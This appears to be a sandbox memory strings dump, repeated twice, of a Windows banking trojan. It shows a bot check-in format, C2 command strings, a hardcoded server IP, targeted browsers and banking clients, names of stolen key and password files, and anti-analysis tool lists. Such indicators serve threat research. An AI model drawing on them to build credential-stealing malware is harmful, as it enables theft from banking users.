ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
winlogon.exe_708_rwx_01D70000_000C3000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP3!F9BE9A8A
SYSTEM!XP3!F9BE9A8A
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
`.data
`.data
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
Explorer.EXE_880_rwx_01E50000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
